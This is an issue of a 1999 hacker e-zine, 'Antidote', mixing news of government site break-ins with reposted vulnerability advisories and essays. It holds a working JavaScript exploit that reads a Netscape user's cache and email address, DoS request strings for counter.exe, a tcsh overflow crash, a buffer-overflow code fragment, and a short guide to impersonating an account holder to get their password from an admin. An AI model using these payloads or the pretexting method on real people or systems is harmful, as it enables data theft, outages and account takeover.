Volume 2 Issue 6 5/29/99

http://www.thepoison.org/antidote

    bof_ptr = (long *)buffer;
    for (i = 0; i < bufsize - 4; i += 4)
        *(bof_ptr++) = get_sp() - offs;
    printf("Creating termcap f1le\n");
    printf("b1tch is Fe3lin 1t.\n");

------------------------------

In this issue of Antidote, we have over 580 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you.

--=\\Contents\\=--

0.00 - Beginning
    0.01 - What?
    0.02 - FAQ
    0.03 - Shouts
    0.04 - Writing
1.00 - News
    1.01 - Cold Fusion Fixes
    1.02 - Bombs on the Net
    1.03 - Government Issues
2.00 - Exploits (new & older)
    2.01 - counter_exe.dos.txt
    2.02 - exlibris.alpeh.webserver.txt
    2.03 - alibaba2_0.genkey.txt
    2.04 - nt4_sp4.quota.dos.txt
    2.05 - netscape.title_tag.txt
    2.06 - tcsh.bof.txt
3.00 - Misc
    3.01 - Social Engineering
    3.02 - Newbie Ethnics
    3.03 - FED Up

------------------------------

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world.
We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us first.
If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it or not.

Well that's it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak EazyMoney Duece Astral PBBSER oX1dation Forlorn Retribution 0dnek www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.04 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine.
If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be:

If Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday. And then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first.

But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

1.01 --=\\Cold Fusion Fixes\\=--

New Allaire Security Zone Bulletins and KB Articles

Dear ColdFusion Customer-

Several new security issues that may affect ColdFusion customers have come to our attention recently. Please visit the Security Zone at the Allaire Web site to learn about these new issues and what actions you can take to address them:

http://www.allaire.com/security

Recently we posted the following new and updated Allaire Security Bulletins and Knowledge Base Articles:

UPDATED
ASB99-02: ColdFusion Example Applications and Sample Code Exposes Servers

ADDED
ASB99-06: Netscape Servers for Win NT Exposure of Source Code with "%20"
ASB99-07: Possible Denial-of-Service Attack Using CF Admin.
Start/Stop Utility
ASB99-08: Pages Encrypted with CFCRYPT.EXE Can Be Illegally Decrypted
Article 10954: Security Best Practice: Securing the ColdFusion Administrator
Article 10953: Security Best Practice: Securing File-based DBs (i.e. Access)
Article 10955: Security Best Practice: URL Session Variables and HTTP_REFERRER

As a Web application platform vendor, one of our highest concerns is the security of the systems our customers deploy. We understand how important security is to our customers, and we're committed to providing the technology and information customers need to build secure Web applications.

Thank you for your time and consideration on this issue.

-- Damon Cooper
Security Response Team Coordinator, Allaire Corporation

P.S. As a reminder, Allaire has set up an email address that customers can use to report security issues associated with an Allaire product: secure@allaire.com.

------------------------------

1.02 --=\\Bombs on the Net\\=--

Well, as many people already know, bomb making webpages will be taken off of the internet. They have always tried to make "bomb making on the internet" illegal, but finally this Littleton incident happened and that made the final decision. This law can never be fully enforced due to the large amounts of webpages there are. There are OVER 20,000,000 webpages (personal and business) in which around .8-9 million have something to do with anarchy or bomb related. Not necessarily webpages dedicated to bomb making, but have maybe ONE recipe on how to make a bomb, but the webpage has other content on it.

There are also ways around it. We all know the Anarchy Cookbook is sold in stores and they have the right to publish it because of "Freedom of Press" and speech. Well, technically you could buy that book and type EVERYTHING that is in that book and put it on the internet and it would be legal. The most important part is the Copyright.
Obviously you would have to get permission from the Author to do this because of copyright laws. If he approves it, then you could do it and it would be legal.

This is a little off of the subject of bomb making, but it fits into the category "freedom of speech" and press. If you have noticed, both of those laws are starting to fade out little by little. First it was cigarettes. You are not allowed to have T.V., billboard, and now they are trying to enforce magazine ads on cigarettes too. Now it is things with the internet. Next it will be violence and maybe even swearing because it "influences" kids to have a bad mouth. To me, if they are going to take away these things, then they should take away some things like that also.

If you think about it, almost every time a "law" like this is taken away, it is because of a current issue that happened in the U.S. So, basically they are taking away our civil rights because of things that we do for a punishment and not just because they feel like it (not necessarily a punishment, just for safety etc...).

Lord Oak
lordoak@thepoison.org

------------------------------

1.03 --=\\Government Issues\\=--

[www.msnbc.com]

THE FBI and Senate Web sites remained inaccessible Friday as a result of the computer attacks. The FBI shut down its Web site Wednesday after it was swamped by a denial-of-service attack. The Senate took its site offline Thursday night after attackers broke into the public computer server and replaced the congressional body’s home page with a screed against the FBI.

The hacked page claimed credit on behalf of a group known as the Masters of Downloading, or M0D and denigrated the FBI as well as Global Hell.

"The FBI may be all over the other groups like ... gH and tK. ... M0D make those morons look like a group of special-ed students! FBI vs. M0D in ’99, bring it on!" read the page, which was peppered with ruder comments and hacker lingo.
"The intrusion compromised our Senate Internet Web site, and as a result the Senate has taken down our Web page to do some investigation," said Sherry Little, a spokeswoman for the Senate sergeant-at-arms, who manages the site. She said FBI agents were heading up the investigation.

"They’re looking at the criminal aspects of it," she told MSNBC. "They’re in charge of the investigation, in that they’re trying to determine where it came from and whether there was any connection at all to any incidents that they’ve explored in the past."

The Web outage rendered the official home pages of all 100 senators and senatorial committees inaccessible, but e-mail and other computer services not related to the public Web site were unaffected, Little said.

System administrators for the FBI and the Senate Web sites were beefing up site security during the down time and no one could say exactly when the sites would be returned to service.

"We’re not expecting this to be a long-term problem," Little said.

The FBI was continuing its investigation into the attack on its own Web site, said Dave Miller, a media representative at the bureau’s national office. He confirmed that this could result in criminal penalties. Although he declined to provide specifics on the investigation, Miller told MSNBC that it would be a logical point that the FBI would look for connections to past attacks on federal Web sites.

Earlier this month, Global Hell was implicated in attacks on a variety of U.S. government sites, including sites for the White House, several Cabinet departments and the U.S. Information Agency. Last week, Global Hell member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three attacks on government computers.

Members of Global Hell reported that law-enforcement officials served search warrants early Wednesday in Seattle, Houston and California.
In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating allegations of computer intrusions involving a teen-ager who uses the hacker handle Mosthated. He said the investigation was continuing and declined further comment.

In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were really mad. ... The computer had all their financial information and stuff on it. Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was really mad.

Mosthated said at least eight other people around the country had been served with search warrants as part of a huge hacker crackdown. Four other Houston-area hackers, three in California and one in Seattle reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said.

An FBI representative in San Diego said she could not comment on the investigation because the paperwork was sealed. Inquiries with the bureau’s Seattle office met with a similar response: "Right now there are still things that need to be decided," one agent told MSNBC on condition of anonymity.

http://www.msnbc.com/news/273819.asp#BODY

------------------------------

2.01 --=\\counter_exe.dos.txt\\=--

A denial of service exists in counter.exe version 2.70, a fairly popular webhit counter used on the Win32 platform with web servers such as IIS and WebSite Pro.
There are two different bugs:

1) When someone requests:

   http://no-such-server-really/scripts/counter.exe?%0A

   this will create an entry in counter.log of a blank line then a ",1". If the person then refreshes their browser and requests it again you get an Access Violation in counter.exe - the instruction at 0x00414c0a referenced memory at 0x00000000.

2) When someone requests:

   http://no-such-server-really/scripts/counter.exe?AAAAAover-2200-As

   you get a similar problem - though not a buffer overrun.

Whilst in a state of "hanging" all other valid requests for counter are queued and not dealt with until someone goes to the console and okays the AV messages. Added to this memory can be consumed if the page is continuously requested.

I mailed the author twice about this but as I have received no response I have nothing left to do but send this on.

David Litchfield
http://www.infowar.co.uk/mnemonix

------------------------------

2.02 --=\\exlibris.alpeh.webserver.txt\\=--

We have found a security hole in web server bundled with Aleph librarian system ver. 3.25 and higher (ExLibris). The web server in its default configuration allows anybody to view any file in the system the aleph installation owner can access. It is very simple to grab for example /etc/passwd file from Aleph web server.

The bug with all details was already posted to ExLibris and to some groups of Aleph users.

Workaround:

1) do not run web server as root under any circumstance!
2) use /etc/shadow or similar system
3) use tcpd wrappers for denying possible logins
4) watch logs from web server

Please spread this message to Aleph admins!

------------------------------

2.03 --=\\alibaba2_0.genkey.txt\\=--

Some time ago, I downloaded a trial version of an SSL web server product for Windows NT called 'Alibaba 2.0' for evaluation as a possible SSL solution.
I eventually made a decision to use another product, but I ended up using an RSA key pair generated by Alibaba's 'genkey' utility (which is based on the popular SSLeay toolkit).

Whilst recently examining the keys generated by 'genkey' using tools shipped as part of the SSLeay distribution, I discovered what I believe to be a serious flaw:-

The 'genkey' utility erroneously generates a private key with an exponent of '1'. This results in null security since the RSA public key associated with a private exponent of '1' is also '1', with the effect that the session key for each SSL session to a server running 'Alibaba' is sent in the clear.

The result of this vulnerability is that 'secure' web sites that use keys generated by the 'genkey' utility provided with Alibaba 2.0 do not provide any security. Such sites are susceptible to having their transactions snooped by a third party, or falsified by man-in-the-middle attacks.

A further interesting discovery is that both Netscape Navigator and Internet Explorer will happily let the user interact with SSL web sites which have an RSA public key exponent of '1' without bringing the user's attention to the fact that such transactions are, in fact, entirely insecure.

Chris Cowley, Grok Developments Ltd
http://www.grok.co.uk/

[from RISKS-FORUM Digest 20.41]

------------------------------

2.04 --=\\nt4_sp4.quota.dos.txt\\=--

A full file system on %systemdrive% in Terminal Server can easily be reached by an ordinary user by growing his own profile, so denying logon to all roaming profile users who don't have a locally cached copy of their own profile. (Such a result can also be reached by growing the D:\temp dir, but you can prevent that by modifying TEMP and TMP through system policies or by modifying the TEMP and TMP ntuser.dat hive HKCU\environment values.)

Quota profiles in SP4 are not effective to prevent growing of the user profile, and so %systemdrive% can't be protected from growing, and logon for roaming users can be denied by anyone.
The profile quota in SP4 is supposed to give administrators the ability to deny, through system policies, the ability to log off to any user who exceeds a specified quota until he/she brings the profile below the established quota. In fact article Q185561 says:

<< Remember that the user will not be able to log off if the user profile quota is exceeded. >>

But the user can still log off exceeding the quota, if he kills his own process proquota.exe. *He* is the owner of the proquota.exe process, and not the system. It's very simple to do, unless the task manager is disabled through system policies too.

I tried this in NT Terminal Server edition. The problem in Terminal Server may be serious because in case of a full file system on the %systemdrive% drive (which stores the locally cached copies of the profiles of currently logged-on users) logon will be denied to everyone who doesn't have a locally cached copy of his own user profile (virtually all roaming profiles, if the policy of deleting locally cached copies of user profiles is applied).

Nevertheless, this kind of problem still remains if the proquota.exe process security environment is simply changed from user to system, because it comes up only at logoff.

So I think SP4 quota profiles through system policies are not so effective to solve profile quota and security related problems in NT, and especially in NT Terminal Server Edition.

Tonino Lucca

------------------------------

2.05 --=\\netscape.title_tag.txt\\=--

There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they treat JavaScript code in the title of the document.

One may embed JavaScript code in the TITLE tag. If the info about the document is shown, then the JavaScript code is executed. The info about the document may be invoked by a script using 'location="wysiwyg://1/about:document"'. The problem is that the JavaScript code is executed in the security context of the "about:" protocol.
This allows accessing documents in the "about:" protocol such as: "about:cache", "about:config", "about:global", etc.

Vulnerabilities:

*Reading user's cache and accessing information such as passwords, credit card numbers.
*Reading info about the Netscape's configuration ("about:config"). This includes finding user's email address, mail servers, the encoded mail password (it must be saved and may be decoded). This allows reading user's email.

The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.

Workaround: Disable JavaScript

Code:

<SCRIPT>
a=window.open('wysiwyg://1/about:cache');
s='Here are some links in your cache: \n';
for(i=0;i<7;i++)
  s += a.document.links[i] + '\n';
a.close();
alert(s);

a=window.open('wysiwyg://1/about:config');
mag='mail.identity.useremail = ';
mend='general.title_tips';
res=mag;
charstoread=20;
alert('Will try to find your email. May take some time.');

function readit() {
  for(i=0;i<charstoread;i++) {
    t=res;
    a.find(mend);
    for(c=1;c<256;c++) {
      t=res + String.fromCharCode(c);
      if (a.find(t,true,true)) {
        /* alert(c); */
        res=t;
      }
    }
  }
  res=res.substring(mag.length);
  a.close();
  alert("Your email is :\n" + res);
}
setTimeout("readit()",3000);
</SCRIPT>

------------------------------

2.06 --=\\tcsh.bof.txt\\=--

While few days ago there was discussion about bash overflow on bugtraq i found another overflow in tcsh-6.07.09-1 [ rh 5.2 ]. The problem is in too long $HOME environment variable [ very old thing - zgv overflow ]. I don't know if it's a dangerous problem, but like someone said this shell can be used in some kind of script with SUID, etc.

example:

$ HOME=AAAAAAAAAAAAAAA...AAA
$ export HOME
$ tcsh
Segmentation fault (core dumped)
$ gdb tcsh core
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `-csh'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libtermcap.so.2...done.
Reading symbols from /lib/libcrypt.so.1...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
Reading symbols from /lib/libnss_files.so.1...done.
#0 0x410041 in ?? ()
(gdb)

hmmm... that's all =) sorry, if it's not a new thing, but i haven't seen anything like this before on bugtraq...

arkth [holix inc.]
arkth@friko4.onet.pl

------------------------------

3.01 --=\\Social Engineering\\=--

What is Social Engineering?

Basically, social engineering is the art and science of getting people to do what you want them to do. It will not allow you to get people to perform tasks they would never do. Social engineering can involve a lot of 'groundwork', information gathering and idle chit chat before an attempt at gaining information is ever made. Like hacking, most of the work is in the preparation, rather than the attempt itself.

Methods:

The first is the most obvious: you just ask for what you want. Although this usually never works, it still doesn't hurt to try :)

The next method would be getting all the info about what you want to do: where they are located, who they are, email address etc. Here is an example.
Ok, say you want to get an account on a server. Well, first you need to get all the info you possibly can: you need to find someone that has an account on the server, and you want to get ALL the info on that person: his email address, real name, where he lives; the more info the better. Then you email the admin of that server requesting the username or passwd of the person you're trying to mimic. It's as simple as that.

oX1dation

------------------------------

3.02 --=\\Newbie Ethnics\\=--

This is the first article I am writing and as such an occasion I decided to write about my favorite topic which is computer hacking. Now this is not to be confused with system cracking which of course is the act of mindlessly breaking into systems, spreading viruses, and doing things which hurt innocent people who just don't know anything about the world of security. I guess being a native New Yorker I am born with the sense of suspicion and a want of security. Well let me get to the point of this article. It is meant to show all those who call themselves hackers a thing or two. I will guess that only half the people who read this paper will actually amount to being a real hacker. Well without further delay here is a paper on what a hacker really is.

eLLitE DoOdZ

All you newbies who are entering the wonderful world of hacking, I bet you looked into hacking because you want to be one of those "ellite" hackers in the movies right. Let me tell you something right now you will most likely never be one of the James Bond evil geniuses who crack into sensitive military information. Now I don't say this to mean that you aren't intelligent enough, it is simply not possible. It is a rare occasion that someone actually can break into any system that has sensitive information and not be caught. I've heard of less than a half dozen times when this rare occasion occurs. Getting caught is almost inevitable.
Even those who have years of experience in security and programming would have a great task ahead of them for a mission like that. Now those so called "cool techno wiz kids" also have boasted about hacking peoples accounts at school right? Well here's a word to the wise, it's probably not as good as it sounds. And even if they are I'll give you nine to five odds they used some lame program off the internet to complete it. If they were for real they wouldn't ever have admitted they'd done it all over school. So my message is if you want to be some kind of "Super Hacker" rent a movie and make it "A blockbuster night" because you're dreaming. Face it you're a newbie and you have to learn the basics before you do anything to impress your friends. If you can stand the wait you'll reap the rewards of hacking and how cool it can be.

Progz

In the last paragraph I just skimmed over programs. Now the reason I downplay programs is the simple fact that unless you wrote the program it's not hacking. Any idiot can run a program ( I hope!). If you start using programs that do everything for you then what are you learning. I once read somewhere on one of the hundreds of hacking sites I've visited that "Hacking is using your knowledge to gain more knowledge". Now I've spent hours thinking about that and I'll tell you right now that is the best definition I've ever heard. Now please do not misunderstand what I'm saying. There are a select number of programs that are good to have on hand for automating certain tasks. Now if you wanted to find out about the open ports on a computer you have two options. You can run a port surfer or check by hand. Now I almost never use a port surfer because it can cause you problems with your isp as well as not give you all the critical information you need. If you're pressed for time in a wargame with a friend's server or something well then go ahead and use that program. I'll be honest with you's I keep programs on hand.
I have a unix password cracker, port surfer, and even a mailbomber (which I use with much discretion and if you have half a brain you will too). And even keep a disk with a few of those interesting programs that are nice to have. Be wary of programs they are a crutch which you will become permanently attached to if you're not careful.

Newbie tip section

Now if you are an intermediate hacker or above you can skip this section. Read if you like though. This goes out in response to the constant stream of newbies out there who prowl the chat rooms and newsgroups looking for intelligent people and sucking every bit of patience out of them. I can not even count the amount of newbies who have contacted me with questions like "Please teach me to hack?" or the infamous "How do I hack?". If you have any pride or brains you will never say these words in a chat room, newsgroup, or any other medium of the sort. I can not begin to tell you how irritating it is to be asked dumb questions over and over and over again. Day after day, month after month. I know that being new to anything is hard but if you persist in doing things like that you will inevitably learn the true meaning of a flame. But I know you're all wondering how do I find out how to hack then? You use a ****ing search engine! Look up things like "hacking" and "computer security". If you want to chat with other hackers ask specific questions like "Anyone know some good URL's". I'll tell you right now for the time I've been into hacking I've found the best hacking sites right from people in the chat rooms. Not to mention if you find a good site be sure to share with others. I'm sure it will be greatly appreciated.

So what is real hacking anyway?

Well I've told what hacking is not. Now let's talk about what it is. Hacking, as I said before, is using your knowledge to expand your knowledge. Now that means you should become familiar with the various operating systems on the internet which are UNIX and WINDOWS NT.
Port surfing computers is another very honorable way of hacking. You wouldn't believe how many things can be learned by port surfing the various protocols you'll come across. Even if criminal hackers port surf to learn as much about a system as possible. This is because of the golden rule of breaking a system. YOU CAN NOT BREAK INTO A SYSTEM THAT YOU DON'T UNDERSTAND. Now of course if you are guessing passwords you may get in. But what will you do once you're inside. After you know how to use various systems the next step is programming which I recently started. Well that's enough for now. Remember what a hacker is at all times. Lastly look for the Guide to Mostly Harmless Hacking written by Carolyn Meinel.

The Mob Boss (A.K.A. Mafia_man777)

------------------------------

3.03 --=\\FED Up\\=--

As most of us have seen lately on the news is a bunch of "hackers" getting caught, well, it seems as though hackers are getting on the government's nerves. Well, they always have been, but now they are actually arresting large amounts of people. Maybe it is because there has been hacking in: senate.gov, whitehouse.gov, and fbi.gov (no real proof on that one, but there are rumors). If you went to HNN this week, you would have seen the following issues about people getting caught:

FBI Raids Suspect Crackers
Five Busted in Florida
Zyklon Busted
IronLungs Raided
Analyzer Cohorts to Testify Against Him

And a while ago there was:

S C R E A M Caught.

I have never seen anything like this in such a short period of time, even a lot of members from gH got arrested and are in jail right now. The government is now out to get us more than they are Randolf (pretty much)(Randolf is the guy that did the Olympic bombings and has been on the most wanted list for about 2 years.). Think about it, they are looking for hackers and they are looking for Randolph, but they pretty much gave up on him and are just looking for hackers.
Lord Oak
lordoak@thepoison.org

------------------------------

Please go to: www.thepoison.org/popup.html and click on our sponsor because we have to pay the bills some way....

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art is done by Lord Oak and permission is needed before using them. If you would like to use them, please contact him at: lordoak@thepoison.org
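
------------------------------

Added example for section 2.03 (not part of the original issue, and not Alibaba or SSLeay code): with an RSA public exponent of 1 the "encrypted" session-key block is the plaintext block itself, and a check that only tests whether the key pair is mathematically consistent will accept such a key. The function names and the toy key values below are constructed for illustration.

```python
"""RSA exponent sanity check for the 'genkey' report in section 2.03.

Added illustration: toy key sizes and constructed values, no real key material.
"""
from math import gcd


def lcm(a: int, b: int) -> int:
    return a // gcd(a, b) * b


def rsa_public_op(block: int, e: int, n: int) -> int:
    """Textbook RSA public-key operation: block^e mod n.

    In SSL the client pads the session-key material first; the padded
    block is what goes through this operation.
    """
    if not 0 <= block < n:
        raise ValueError("block must be in [0, n)")
    return pow(block, e, n)


def audit_rsa_key(n, e, d=None, p=None, q=None):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if e == 1:
        findings.append("public exponent is 1: ciphertext equals plaintext")
    elif e < 3 or e % 2 == 0:
        # e must be coprime to lcm(p-1, q-1), which is even, so e must be odd.
        findings.append("public exponent is even or below 3")
    if d == 1:
        findings.append("private exponent is 1: decryption is the identity")
    if p is not None and q is not None:
        if p * q != n:
            findings.append("modulus is not p*q")
        elif d is not None and (e * d) % lcm(p - 1, q - 1) != 1:
            findings.append("e*d is not 1 mod lcm(p-1, q-1)")
    return findings


# Constructed toy parameters (far too small for real use).
P, Q = 61, 53
N = P * Q                                     # 3233
GOOD_KEY = dict(n=N, e=17, d=2753, p=P, q=Q)
WEAK_KEY = dict(n=N, e=1, d=1, p=P, q=Q)      # shape of the key described in 2.03
SESSION_BLOCK = 1234                          # stands in for the padded session key


def demo():
    """Show what an eavesdropper sees on the wire for each key."""
    results = {}
    for name, key in (("good", GOOD_KEY), ("weak", WEAK_KEY)):
        wire = rsa_public_op(SESSION_BLOCK, key["e"], key["n"])
        results[name] = {
            "wire_value": wire,
            "leaks_plaintext": wire == SESSION_BLOCK,
            "findings": audit_rsa_key(**key),
        }
    return results


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info)
```

The weak key passes the e*d consistency test because 1*1 is 1 modulo anything, so the explicit exponent checks are what catch it.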